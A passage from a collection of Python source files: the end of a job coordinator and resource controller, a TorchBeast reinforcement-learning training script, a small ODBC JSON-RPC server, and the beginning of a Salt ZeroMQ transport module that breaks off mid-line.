ANY while 1: id=self.server.next(self.host,self.pid,self.success_id) self.success_id=False # ERASE SUCCESS ID if id is True: # WE'RE BEING TOLD TO JUST WAIT time.sleep(60) # SO GO TO SLEEP FOR A MINUTE else: break if id is False: # NO MODE id FOR US TO PROCESS, SO QUIT self.serverStopIteration=True # RECORD THIS AS GENUINE END EVENT raise StopIteration else: # HAND BACK THE id TO THE USER self.pending_id=id return id def report_success(self,id): "report successful completion of task ID" self.server.report_success(self.host,self.pid,id) def report_error(self,id): "report an error using traceback.print_exc()" import StringIO err_report=StringIO.StringIO() traceback.print_exc(self.max_tb,sys.stderr) #REPORT TB TO OUR LOG traceback.print_exc(self.max_tb,err_report) #REPORT TB TO SERVER self.server.report_error(self.host,self.pid,id,err_report.getvalue()) err_report.close() def report_load(self): "report system load" load=os.getloadavg()[0] # GET 1 MINUTE LOAD AVERAGE if self.rc_server.report_load(self.host,self.pid,load) is False: self.overload_count+=1 # ARE WE CONSISTENTLY OVERLOADED FOR EXTENDED PERIOD? if self.overload_count>self.overload_max: # IF EXCEEDED LIMIT, EXIT self.exit('load too high') else: self.overload_count=0 def open_resource(self,resource,mode): "get a file object for the requested resource, opened in mode" while 1: rule=self.rc_server.get_resource(self.host,self.pid,resource) if rule is False: # WE HAVE TO LOCK AND APPLY A RULE... rule=self.acquire_rule(resource) if rule is True: # HMM, LOOKS LIKE A RACE CONDITION. KEEP WAITING time.sleep(60) # WAIT A MINUTE BEFORE ASKING FOR RESOURCE AGAIN continue return ResourceFile(resource,rule,mode,self) #CONSTRUCT THE RESOURCE elif rule is True: # RULE IS LOCKED BY ANOTHER PROCESSOR time.sleep(60) # WAIT A MINUTE BEFORE ASKING FOR RESOURCE AGAIN else: # GOT A REGULAR FILE, SO JUST OPEN IT return file(rule,mode) def acquire_rule(self,resource): "lock the specified resource rule for this host, so it's safe to build it" rule=self.rc_server.acquire_rule(self.host,self.pid,resource) if rule is False: # NO SUCH RESOURCE?!? self.exit('invalid resource: '+resource) return rule def release_rule(self,resource): "release our lock on this resource rule, so others can use it" self.rc_server.release_rule(self.host,self.pid,resource) def exit(self,message): "save message for self.unregister() and force exit" self.exit_message=message raise SystemExit def run_all(self,resultGenerator,**kwargs): "run until all task IDs completed, trap & report all errors" errors_in_a_row=0 it=resultGenerator(self,**kwargs) # GET ITERATOR FROM GENERATOR report_time=time.time() self.register() # REGISTER WITH RESOURCE CONTROLLER & COORDINATOR initializationError=None try: # TRAP ERRORS BOTH IN USER CODE AND coordinator CODE while 1: try: # TRAP AND REPORT ALL ERRORS IN USER CODE id=it.next() # THIS RUNS USER CODE FOR ONE ITERATION self.success_id=id # MARK THIS AS A SUCCESS... errors_in_a_row=0 initializationError=False except StopIteration: # NO MORE TASKS FOR US... if not hasattr(self,'serverStopIteration'): # WIERD!! # USER CODE RAISED StopIteration?!? self.report_error(self.pending_id) # REPORT THE PROBLEM self.exit_message='user StopIteration error' elif initializationError: self.exit_message='initialization error' else: self.exit_message='done' break except SystemExit: # sys.exit() CALLED raise # WE REALLY DO WANT TO EXIT. except: # MUST HAVE BEEN AN ERROR IN THE USER CODE if initializationError is None: # STILL IN INITIALIZATION initializationError=True self.report_error(self.pending_id) # REPORT THE PROBLEM errors_in_a_row +=1 if errors_in_a_row>=self.max_errors_in_a_row: self.exit_message='too many errors' break if time.time()-report_time>self.report_frequency: self.report_load() # SEND A ROUTINE LOAD REPORT report_time=time.time() except SystemExit: # sys.exit() CALLED pass # WE REALLY DO WANT TO EXIT. except: # IMPORTANT TO TRAP ALL ERRORS SO THAT WE UNREGISTER!! traceback.print_exc(self.max_tb,sys.stderr) #REPORT TB TO OUR LOG self.exit_message='error trap' self.unregister('run_all '+self.exit_message) # MUST UNREGISTER!! def run_interactive(self,it,n=1,**kwargs): "run n task IDs, with no error trapping" if not hasattr(it,'next'): it=it(self,**kwargs) # ASSUME it IS GENERATOR, USE IT TO GET ITERATOR i=0 self.register() # REGISTER WITH RESOURCE CONTROLLER & COORDINATOR try: # EVEN IF ERROR OCCURS, WE MUST UNREGISTER!! for id in it: self.success_id=id i+=1 if i>=n: break except: self.unregister('run_interactive error') # MUST UNREGISTER!!! raise # SHOW THE ERROR INTERACTIVELY self.unregister('run_interactive exit') return it # HAND BACK ITERATOR IN CASE USER WANTS TO RUN MORE... def parse_argv(): "parse sys.argv into a dictionary of GNU-style args --foo=bar and list of other args" d={} l=[] for v in sys.argv[1:]: if v[:2]=='--': try: k,v=v[2:].split('=') d[k]=v except ValueError: d[v[2:]]=None else: l.append(v) return d,l def start_client_or_server(clientGenerator,serverGenerator,resources,script): """start controller, client or server depending on whether we get coordinator argument from the command-line args. Client must be a generator function that takes Processor as argument, and uses it as an iterator. Also, clientGenerator must yield the IDs that the Processor provides (this structure allows us to trap all exceptions from clientGenerator, while allowing it to do resource initializations that would be much less elegant in a callback function.) Server must be a function that returns an iterator (e.g. a generator). Resources is a list of strings naming the resources we need copied to local host for client to be able to do its work. Both client and server constructors use **kwargs to get command line arguments (passed as GNU-style --foo=bar; see the constructor arguments to see the list of options that each can be passed. #CALL LIKE THIS FROM yourscript.py: import coordinator if __name__=='__main__': coordinator.start_client_or_server(clientGen,serverGen,resources,__file__) To start the resource controller: python coordinator.py --rc=NAME [options] To start a job coordinator: python yourscript.py NAME [--rc_url=URL] [options] To start a job processor: python yourscript.py --url=URL --rc_url=URL [options]""" d,l=parse_argv() if 'url' in d: # WE ARE A CLIENT! client=Processor(**d) time.sleep(5) # GIVE THE SERVER SOME BREATHING SPACE client.run_all(clientGenerator,**d) elif 'rc' in d: # WE ARE THE RESOURCE CONTROLLER rc_server=ResourceController(**d) # NAME FOR THIS CONTROLLER... detach_as_demon_process(rc_server) rc_server() # START THE SERVER else: # WE ARE A SERVER try: # PASS OUR KWARGS TO THE SERVER FUNCTION it=serverGenerator(**d) except TypeError: # DOESN'T WANT ANY ARGS? it=serverGenerator() server=Coordinator(l[0],script,it,resources,**d) detach_as_demon_process(server) server() # START THE SERVER class CoordinatorMonitor(object): "Monitor a Coordinator." def __init__(self,coordInfo): self.name,self.url,self.priority,self.allocated_ncpu,self.ncpu,\ self.start_time=coordInfo self.server=xmlrpclib.ServerProxy(self.url) self.get_status() def get_status(self): self.name,self.errlog,self.n,self.nsuccess,self.nerrors,self.client_report,\ self.pending_report,self.logfile=self.server.get_status() print "Got status from Coordinator:",self.name,self.url def __getattr__(self,attr): "just pass on method requests to our server" return getattr(self.server,attr) class RCMonitor(object): """monitor a ResourceController. Useful methods: get_status() load_balance() setrule(rsrc,rule) delrule(rsrc) setload(host,maxload) retry_unused_hosts() Documented in ResourceController docstrings.""" def __init__(self,host=None,port=5000): host=get_hostname(host) # GET FQDN self.rc_url='http://%s:%d' %(host,port) self.rc_server=xmlrpclib.ServerProxy(self.rc_url) self.get_status() def get_status(self): self.name,self.errlog,self.systemLoad,self.hosts,coordinators, \ self.rules,self.resources,self.locks=self.rc_server.get_status() print "Got status from ResourceController:",self.name,self.rc_url self.coordinators={} for cinfo in coordinators: try: # IF COORDINATOR HAS DIED, STILL WANT TO RETURN RCMonitor... self.coordinators[cinfo[0]]=CoordinatorMonitor(cinfo) except socket.error,e: # JUST COMPLAIN, BUT CONTINUE... print >>sys.stderr,"Unable to connect to coordinator:",cinfo,e def __getattr__(self,attr): "just pass on method requests to our rc_server" return getattr(self.rc_server,attr) def test_client(server,**kwargs): for id in server: print 'ID',id yield id time.sleep(1) def test_server(): return range(1000) if __name__=='__main__': start_client_or_server(test_client,test_server,[],__file__)
polybeast.py
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import collections import logging import os import signal import subprocess import threading import time import timeit import traceback os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading. import nest import torch from libtorchbeast import actorpool from torch import nn from torch.nn import functional as F from torchbeast.core import file_writer from torchbeast.core import vtrace # yapf: disable parser = argparse.ArgumentParser(description="PyTorch Scalable Agent") parser.add_argument("--pipes_basename", default="unix:/tmp/polybeast", help="Basename for the pipes for inter-process communication. " "Has to be of the type unix:/some/path.") parser.add_argument("--mode", default="train", choices=["train", "test", "test_render"], help="Training or test mode.") parser.add_argument("--xpid", default=None, help="Experiment id (default: None).") parser.add_argument("--start_servers", dest="start_servers", action="store_true", help="Spawn polybeast_env servers automatically.") parser.add_argument("--no_start_servers", dest="start_servers", action="store_false", help="Don't spawn polybeast_env servers automatically.") parser.set_defaults(start_servers=True) parser.add_argument("--env", type=str, default="PongNoFrameskip-v4", help="Gym environment. Ignored if --no_start_servers is passed.") # Training settings. parser.add_argument("--disable_checkpoint", action="store_true", help="Disable saving checkpoint.") parser.add_argument("--savedir", default="~/logs/torchbeast", help="Root dir where experiment data will be saved.") parser.add_argument("--num_actors", default=4, type=int, metavar="N", help="Number of actors.") parser.add_argument("--total_steps", default=100000, type=int, metavar="T", help="Total environment steps to train for.") parser.add_argument("--batch_size", default=8, type=int, metavar="B", help="Learner batch size.") parser.add_argument("--unroll_length", default=80, type=int, metavar="T", help="The unroll length (time dimension).") parser.add_argument("--num_learner_threads", default=2, type=int, metavar="N", help="Number learner threads.") parser.add_argument("--num_inference_threads", default=2, type=int, metavar="N", help="Number learner threads.") parser.add_argument("--disable_cuda", action="store_true", help="Disable CUDA.") parser.add_argument("--num_actions", default=6, type=int, metavar="A", help="Number of actions.") parser.add_argument("--use_lstm", action="store_true", help="Use LSTM in agent model.") parser.add_argument("--max_learner_queue_size", default=None, type=int, metavar="N", help="Optional maximum learner queue size. Defaults to batch_size.") # Loss settings. parser.add_argument("--entropy_cost", default=0.0006, type=float, help="Entropy cost/multiplier.") parser.add_argument("--baseline_cost", default=0.5, type=float, help="Baseline cost/multiplier.") parser.add_argument("--discounting", default=0.99, type=float, help="Discounting factor.") parser.add_argument("--reward_clipping", default="abs_one", choices=["abs_one", "none"], help="Reward clipping.") # Optimizer settings. parser.add_argument("--learning_rate", default=0.00048, type=float, metavar="LR", help="Learning rate.") parser.add_argument("--alpha", default=0.99, type=float, help="RMSProp smoothing constant.") parser.add_argument("--momentum", default=0, type=float, help="RMSProp momentum.") parser.add_argument("--epsilon", default=0.01, type=float, help="RMSProp epsilon.") parser.add_argument("--grad_norm_clipping", default=40.0, type=float, help="Global gradient norm clip.") # Misc settings. parser.add_argument("--write_profiler_trace", action="store_true", help="Collect and write a profiler trace " "for chrome://tracing/.") # yapf: enable logging.basicConfig( format=( "[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s" ), level=0, ) def compute_baseline_loss(advantages): return 0.5 * torch.sum(advantages ** 2) def compute_entropy_loss(logits): """Return the entropy loss, i.e., the negative entropy of the policy.""" policy = F.softmax(logits, dim=-1) log_policy = F.log_softmax(logits, dim=-1) return torch.sum(policy * log_policy) def compute_policy_gradient_loss(logits, actions, advantages): cross_entropy = F.nll_loss( F.log_softmax(torch.flatten(logits, 0, 1), dim=-1), target=torch.flatten(actions, 0, 1), reduction="none", ) cross_entropy = cross_entropy.view_as(advantages) return torch.sum(cross_entropy * advantages.detach()) class Net(nn.Module): def __init__(self, num_actions, use_lstm=False): super(Net, self).__init__() self.num_actions = num_actions self.use_lstm = use_lstm self.feat_convs = [] self.resnet1 = [] self.resnet2 = [] self.convs = [] input_channels = 4 for num_ch in [16, 32, 32]: feats_convs = [] feats_convs.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) feats_convs.append(nn.MaxPool2d(kernel_size=3, stride=2, padding=1)) self.feat_convs.append(nn.Sequential(*feats_convs)) input_channels = num_ch for i in range(2): resnet_block = [] resnet_block.append(nn.ReLU()) resnet_block.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) resnet_block.append(nn.ReLU()) resnet_block.append( nn.Conv2d( in_channels=input_channels, out_channels=num_ch, kernel_size=3, stride=1, padding=1, ) ) if i == 0: self.resnet1.append(nn.Sequential(*resnet_block)) else: self.resnet2.append(nn.Sequential(*resnet_block)) self.feat_convs = nn.ModuleList(self.feat_convs) self.resnet1 = nn.ModuleList(self.resnet1) self.resnet2 = nn.ModuleList(self.resnet2) self.fc = nn.Linear(3872, 256) # FC output size + last reward. core_output_size = self.fc.out_features + 1 if use_lstm: self.core = nn.LSTM(core_output_size, 256, num_layers=1) core_output_size = 256 self.policy = nn.Linear(core_output_size, self.num_actions) self.baseline = nn.Linear(core_output_size, 1) def initial_state(self, batch_size=1): if not self.use_lstm: return tuple() return tuple( torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size) for _ in range(2) ) def forward(self, inputs, core_state): x = inputs["frame"] T, B, *_ = x.shape x = torch.flatten(x, 0, 1) # Merge time and batch. x = x.float() / 255.0 res_input = None for i, fconv in enumerate(self.feat_convs): x = fconv(x) res_input = x x = self.resnet1[i](x) x += res_input res_input = x x = self.resnet2[i](x) x += res_input x = F.relu(x) x = x.view(T * B, -1) x = F.relu(self.fc(x)) clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1) core_input = torch.cat([x, clipped_reward], dim=-1) if self.use_lstm: core_input = core_input.view(T, B, -1) core_output_list = [] notdone = (1 - inputs["done"]).float() for input, nd in zip(core_input.unbind(), notdone.unbind()): # Reset core state to zero whenever an episode ended. # Make `done` broadcastable with (num_layers, B, hidden_size) # states: nd = nd.view(1, -1, 1) core_state = nest.map(nd.mul, core_state) output, core_state = self.core(input.unsqueeze(0), core_state) core_output_list.append(output) core_output = torch.flatten(torch.cat(core_output_list), 0, 1) else: core_output = core_input policy_logits = self.policy(core_output) baseline = self.baseline(core_output) if self.training: action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1) else: # Don't sample when testing. action = torch.argmax(policy_logits, dim=1) policy_logits = policy_logits.view(T, B, self.num_actions) baseline = baseline.view(T, B) action = action.view(T, B) return (action, policy_logits, baseline), core_state def inference(flags, inference_batcher, model, lock=threading.Lock()): # noqa: B008 with torch.no_grad(): for batch in inference_batcher: batched_env_outputs, agent_state = batch.get_inputs() frame, reward, done, *_ = batched_env_outputs frame = frame.to(flags.actor_device, non_blocking=True) reward = reward.to(flags.actor_device, non_blocking=True) done = done.to(flags.actor_device, non_blocking=True) agent_state = nest.map( lambda t: t.to(flags.actor_device, non_blocking=True), agent_state ) with lock: outputs = model( dict(frame=frame, reward=reward, done=done), agent_state ) outputs = nest.map(lambda t: t.cpu(), outputs) batch.set_outputs(outputs) EnvOutput = collections.namedtuple( "EnvOutput", "frame rewards done episode_step episode_return" ) AgentOutput = collections.namedtuple("AgentOutput", "action policy_logits baseline") Batch = collections.namedtuple("Batch", "env agent") def learn( flags, learner_queue, model, actor_model, optimizer, scheduler, stats, plogger, lock=threading.Lock(), ): for tensors in learner_queue: tensors = nest.map(lambda t: t.to(flags.learner_device), tensors) batch, initial_agent_state = tensors env_outputs, actor_outputs = batch frame, reward, done, *_ = env_outputs lock.acquire() # Only one thread learning at a time. learner_outputs, unused_state = model( dict(frame=frame, reward=reward, done=done), initial_agent_state ) # Take final value function slice for bootstrapping. learner_outputs = AgentOutput._make(learner_outputs) bootstrap_value = learner_outputs.baseline[-1] # Move from obs[t] -> action[t] to action[t] -> obs[t]. batch = nest.map(lambda t: t[1:], batch) learner_outputs = nest.map(lambda t: t[:-1], learner_outputs) # Turn into namedtuples again. env_outputs, actor_outputs = batch env_outputs = EnvOutput._make(env_outputs) actor_outputs = AgentOutput._make(actor_outputs) learner_outputs = AgentOutput._make(learner_outputs) if flags.reward_clipping == "abs_one": clipped_rewards = torch.clamp(env_outputs.rewards, -1, 1) elif flags.reward_clipping == "none": clipped_rewards = env_outputs.rewards discounts = (1 - env_outputs.done).float() * flags.discounting vtrace_returns = vtrace.from_logits( behavior_policy_logits=actor_outputs.policy_logits, target_policy_logits=learner_outputs.policy_logits, actions=actor_outputs.action, discounts=discounts, rewards=clipped_rewards, values=learner_outputs.baseline, bootstrap_value=bootstrap_value, ) pg_loss = compute_policy_gradient_loss( learner_outputs.policy_logits, actor_outputs.action, vtrace_returns.pg_advantages, ) baseline_loss = flags.baseline_cost * compute_baseline_loss( vtrace_returns.vs - learner_outputs.baseline ) entropy_loss = flags.entropy_cost * compute_entropy_loss( learner_outputs.policy_logits ) total_loss = pg_loss + baseline_loss + entropy_loss scheduler.step() optimizer.zero_grad() total_loss.backward() nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping) optimizer.step() actor_model.load_state_dict(model.state_dict()) episode_returns = env_outputs.episode_return[env_outputs.done] stats["step"] = stats.get("step", 0) + flags.unroll_length * flags.batch_size stats["episode_returns"] = tuple(episode_returns.cpu().numpy()) stats["mean_episode_return"] = torch.mean(episode_returns).item() stats["mean_episode_step"] = torch.mean(env_outputs.episode_step.float()).item() stats["total_loss"] = total_loss.item() stats["pg_loss"] = pg_loss.item() stats["baseline_loss"] = baseline_loss.item() stats["entropy_loss"] = entropy_loss.item() stats["learner_queue_size"] = learner_queue.size() plogger.log(stats) if not len(episode_returns): # Hide the mean-of-empty-tuple NaN as it scares people. stats["mean_episode_return"] = None lock.release() def train(flags): if flags.xpid is None: flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S") plogger = file_writer.FileWriter( xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir ) checkpointpath = os.path.expandvars( os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar")) ) if not flags.disable_cuda and torch.cuda.is_available(): logging.info("Using CUDA.") flags.learner_device = torch.device("cuda:0") flags.actor_device = torch.device("cuda:1") else: logging.info("Not using CUDA.") flags.learner_device = torch.device("cpu") flags.actor_device = torch.device("cpu") if flags.max_learner_queue_size is None: flags.max_learner_queue_size = flags.batch_size # The queue the learner threads will get their data from. # Setting `minimum_batch_size == maximum_batch_size` # makes the batch size static. learner_queue = actorpool.BatchingQueue( batch_dim=1, minimum_batch_size=flags.batch_size, maximum_batch_size=flags.batch_size, check_inputs=True, maximum_queue_size=flags.max_learner_queue_size, ) # The "batcher", a queue for the inference call. Will yield # "batch" objects with `get_inputs` and `set_outputs` methods. # The batch size of the tensors will be dynamic. inference_batcher = actorpool.DynamicBatcher( batch_dim=1, minimum_batch_size=1, maximum_batch_size=512, timeout_ms=100, check_outputs=True, ) addresses = [] connections_per_server = 1 pipe_id = 0 while len(addresses) < flags.num_actors: for _ in range(connections_per_server): addresses.append(f"{flags.pipes_basename}.{pipe_id}") if len(addresses) == flags.num_actors: break pipe_id += 1 model = Net(num_actions=flags.num_actions, use_lstm=flags.use_lstm) model = model.to(device=flags.learner_device) actor_model = Net(num_actions=flags.num_actions, use_lstm=flags.use_lstm) actor_model.to(device=flags.actor_device) # The ActorPool that will run `flags.num_actors` many loops. actors = actorpool.ActorPool( unroll_length=flags.unroll_length, learner_queue=learner_queue, inference_batcher=inference_batcher, env_server_addresses=addresses, initial_agent_state=actor_model.initial_state(), ) def run(): try: actors.run() except Exception as e: logging.error("Exception in actorpool thread!") traceback.print_exc() print() raise e actorpool_thread = threading.Thread(target=run, name="actorpool-thread") optimizer = torch.optim.RMSprop( model.parameters(), lr=flags.learning_rate, momentum=flags.momentum, eps=flags.epsilon, alpha=flags.alpha, ) def lr_lambda(epoch): return ( 1 - min(epoch * flags.unroll_length * flags.batch_size, flags.total_steps) / flags.total_steps ) scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda) stats = {} # Load state from a checkpoint, if possible. if os.path.exists(checkpointpath): checkpoint_states = torch.load( checkpointpath, map_location=flags.learner_device ) model.load_state_dict(checkpoint_states["model_state_dict"]) optimizer.load_state_dict(checkpoint_states["optimizer_state_dict"]) scheduler.load_state_dict(checkpoint_states["scheduler_state_dict"]) stats = checkpoint_states["stats"] logging.info(f"Resuming preempted job, current stats:\n{stats}") # Initialize actor model like learner model. actor_model.load_state_dict(model.state_dict()) learner_threads = [ threading.Thread( target=learn, name="learner-thread-%i" % i, args=( flags, learner_queue, model, actor_model, optimizer, scheduler, stats, plogger, ), ) for i in range(flags.num_learner_threads) ] inference_threads = [ threading.Thread( target=inference, name="inference-thread-%i" % i, args=(flags, inference_batcher, actor_model), ) for i in range(flags.num_inference_threads) ] actorpool_thread.start() for t in learner_threads + inference_threads: t.start() def checkpoint(): if flags.disable_checkpoint: return logging.info("Saving checkpoint to %s", checkpointpath) torch.save( { "model_state_dict": model.state_dict(), "optimizer_state_dict": optimizer.state_dict(), "scheduler_state_dict": scheduler.state_dict(), "stats": stats, "flags": vars(flags), }, checkpointpath, ) def format_value(x): return f"{x:1.5}" if isinstance(x, float) else str(x) try: last_checkpoint_time = timeit.default_timer() while True: start_time = timeit.default_timer() start_step = stats.get("step", 0) if start_step >= flags.total_steps: break time.sleep(5) end_step = stats.get("step", 0) if timeit.default_timer() - last_checkpoint_time > 10 * 60: # Save every 10 min. checkpoint() last_checkpoint_time = timeit.default_timer() logging.info( "Step %i @ %.1f SPS. Inference batcher size: %i." " Learner queue size: %i." " Other stats: (%s)", end_step, (end_step - start_step) / (timeit.default_timer() - start_time), inference_batcher.size(), learner_queue.size(), ", ".join( f"{key} = {format_value(value)}" for key, value in stats.items() ), ) except KeyboardInterrupt: pass # Close properly. else: logging.info("Learning finished after %i steps.", stats["step"]) checkpoint() # Done with learning. Stop all the ongoing work. inference_batcher.close() learner_queue.close() actorpool_thread.join() for t in learner_threads + inference_threads: t.join() def test(flags): raise NotImplementedError() def main(flags): if not flags.pipes_basename.startswith("unix:"): raise Exception("--pipes_basename has to be of the form unix:/some/path.") if flags.start_servers: command = [ "python", "-m", "torchbeast.polybeast_env", f"--num_servers={flags.num_actors}", f"--pipes_basename={flags.pipes_basename}", f"--env={flags.env}", ] logging.info("Starting servers with command: " + " ".join(command)) server_proc = subprocess.Popen(command) if flags.mode == "train": if flags.write_profiler_trace: logging.info("Running with profiler.") with torch.autograd.profiler.profile() as prof: train(flags) filename = "chrome-%s.trace" % time.strftime("%Y%m%d-%H%M%S") logging.info("Writing profiler trace to '%s.gz'", filename) prof.export_chrome_trace(filename) os.system("gzip %s" % filename) else: train(flags) else: test(flags) if flags.start_servers: # Send Ctrl-c to servers. server_proc.send_signal(signal.SIGINT) if __name__ == "__main__": flags = parser.parse_args() main(flags)
server.py
from http.server import HTTPServer import ssl import sys import types import pyodbc from odbcnotebook import jsonrpc, odbc USAGE = 'odbcnotebook [-p PORT] [-c CONNECTION_STRING] [-s KEY CERT PASSWORD]' def wrap_ssl(runconfig, sock): """ Wraps a socket in an SSL context, if SSL is enabled. """ if runconfig.ssl: context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) context.load_cert_chain(runconfig.certificate, runconfig.key, password=runconfig.keypassword) return context.wrap_socket(sock, server_side=True) else: return sock def parse_args(): """ Parses command-line arguments and returns a run configuration """ runconfig = types.SimpleNamespace() runconfig.ssl = False runconfig.port = None runconfig.connection_string = None i = 1 try: while i < len(sys.argv): arg = sys.argv[i] if arg == '-s': if runconfig.ssl: raise ValueError runconfig.ssl = True runconfig.certificate = sys.argv[i + 1] runconfig.key = sys.argv[i + 2] runconfig.keypassword = sys.argv[i + 3] i += 4 elif arg == '-p': if runconfig.port is not None: raise ValueError runconfig.port = int(sys.argv[i + 1]) if runconfig.port <= 0 or runconfig.port > 65536: raise ValueError i += 2 elif arg == '-c': if runconfig.connection_string is not None: raise ValueError runconfig.connection_string = sys.argv[i + 1] i += 2 else: raise ValueError if runconfig.connection_string is None: raise ValueError except (IndexError, ValueError): print(USAGE) sys.exit(1) if runconfig.port is None: runconfig.port = 1995 return runconfig def run_server(runconfig): """ Processes RPC requests until the server is closed """ try: connection = pyodbc.connect(runconfig.connection_string) except pyodbc.Error as err: print('Failed to open ODBC conncetion:', err) return odbc_inst = odbc.RPC(connection) handler_class = jsonrpc.make_json_handler(odbc_inst) server = HTTPServer(('localhost', runconfig.port), handler_class) def shutdown(): # Since HTTPServer.shutdown blocks until the server shuts down, the # only way to call it is from a thread that isn't running that HTTPServer import threading threading.Thread(target=server.shutdown).start() odbc_inst.set_shutdown(shutdown) server.socket = wrap_ssl(runconfig, server.socket) server.serve_forever() def main(): """ Entry point """ run_server(parse_args())
zeromq.py
# -*- coding: utf-8 -*- ''' Zeromq transport classes ''' # Import Python Libs from __future__ import absolute_import, print_function, unicode_literals import os import sys import copy import errno import signal import hashlib import logging import weakref import threading from random import randint # Import Salt Libs import salt.auth import salt.crypt import salt.log.setup import salt.utils.event import salt.utils.files import salt.utils.minions import salt.utils.process import salt.utils.stringutils import salt.utils.verify import salt.utils.zeromq import salt.payload import salt.transport.client import salt.transport.server import salt.transport.mixins.auth from salt.ext import six from salt.exceptions import SaltReqTimeoutError, SaltException from salt._compat import ipaddress from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO import zmq.error import zmq.eventloop.ioloop import zmq.eventloop.zmqstream try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False # Import Tornado Libs import tornado import tornado.gen import tornado.concurrent # Import third party libs try: from M2Crypto import RSA HAS_M2 = True except ImportError: HAS_M2 = False try: from Cryptodome.Cipher import PKCS1_OAEP except ImportError: from Crypto.Cipher import PKCS1_OAEP log = logging.getLogger(__name__) def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None): ''' Return the ZeroMQ URI to connect the Minion to the Master. It supports different source IP / port, given the ZeroMQ syntax: // Connecting using a IP address and bind to an IP address rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0); Source: http://api.zeromq.org/4-1:zmq-tcp ''' from salt.utils.zeromq import ip_bracket master_uri = 'tcp://{master_ip}:{master_port}'.format( master_ip=ip_bracket(master_ip), master_port=master_port) if source_ip or source_port: if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1): # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6 # which is included in the pyzmq wheels starting with 16.0.1. if source_ip and source_port: master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format( source_ip=ip_bracket(source_ip), source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port) elif source_ip and not source_port: master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format( source_ip=ip_bracket(source_ip), master_ip=ip_bracket(master_ip), master_port=master_port) elif source_port and not source_ip: ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::') master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format( ip_any=ip_any, source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port) else: log.warning('Unable to connect to the Master using a specific source IP / port') log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6') log.warning('Specific source IP / port for connecting to master returner port: configuraion ignored') return master_uri class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel): ''' Encapsulate sending routines to ZeroMQ. ZMQ Channels default to 'crypt=aes' ''' # This class is only a singleton per minion/master pair # mapping of io_loop -> {key -> channel} instance_map = weakref.WeakKeyDictionary() def __new__(cls, opts, **kwargs): ''' Only create one instance of channel per __key() ''' # do we have any mapping for this io_loop io_loop = kwargs.get('io_loop') if io_loop is None: install_zmq() io_loop = ZMQDefaultLoop.current() if io_loop not in cls.instance_map: cls.instance_map[io_loop] = weakref.WeakValueDictionary() loop_instance_map = cls.instance_map[io_loop] key = cls.__key(opts, **kwargs) obj = loop_instance_map.get(key) if obj is None: log.debug('Initializing new AsyncZeroMQReqChannel for %s', key) # we need to make a local variable for this, as we are going to store # it in a WeakValueDictionary-- which will remove the item if no one # references it-- this forces a reference while we return to the caller obj = object.__new__(cls) obj.__singleton_init__(opts, **kwargs) loop_instance_map[key] = obj log.trace('Inserted key into loop_instance_map id %s for key %s and process %s', id(loop_instance_map), key, os.getpid()) else: log.debug('Re-using AsyncZeroMQReqChannel for %s', key) return obj def __deepcopy__(self, memo): cls = self.__class__ result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args memo[id(self)] = result for key in self.__dict__: if key in ('_io_loop',): continue # The _io_loop has a thread Lock which will fail to be deep # copied. Skip it because it will just be recreated on the # new copy. if key == 'message_client': # Recreate the message client because it will fail to be deep # copied. The reason is the same as the io_loop skip above. setattr(result, key, AsyncReqMessageClientPool(result.opts, args=(result.opts, self.master_uri,), kwargs={'io_loop': self._io_loop})) continue setattr(result, key, copy.deepcopy(self.__dict__[key], memo)) return result @classmethod def __key(cls, opts, **kwargs): return (opts['pki_dir'], # where the keys are stored opts['id'], # minion ID kwargs.get('master_uri', opts.get('master_uri')), # master ID kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt ) # has to remain empty for singletons, since __init__ will *always* be called def __init__(self, opts, **kwargs): pass # an init for the singleton instance to call def __singleton_init__(self, opts, **kwargs): self.opts = dict(opts) self.ttype = 'zeromq' # crypt defaults to 'aes' self.crypt = kwargs.get('crypt', 'aes') if 'master_uri' in kwargs: self.opts['master_uri'] = kwargs['master_uri'] self._io_loop = kwargs.get('io_loop') if self._io_loop is None: install_zmq() self._io_loop = ZMQDefaultLoop.current() if self.crypt != 'clear': # we don't need to worry about auth as a kwarg, since its a singleton self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop) log.debug('Connecting the Minion to the Master URI 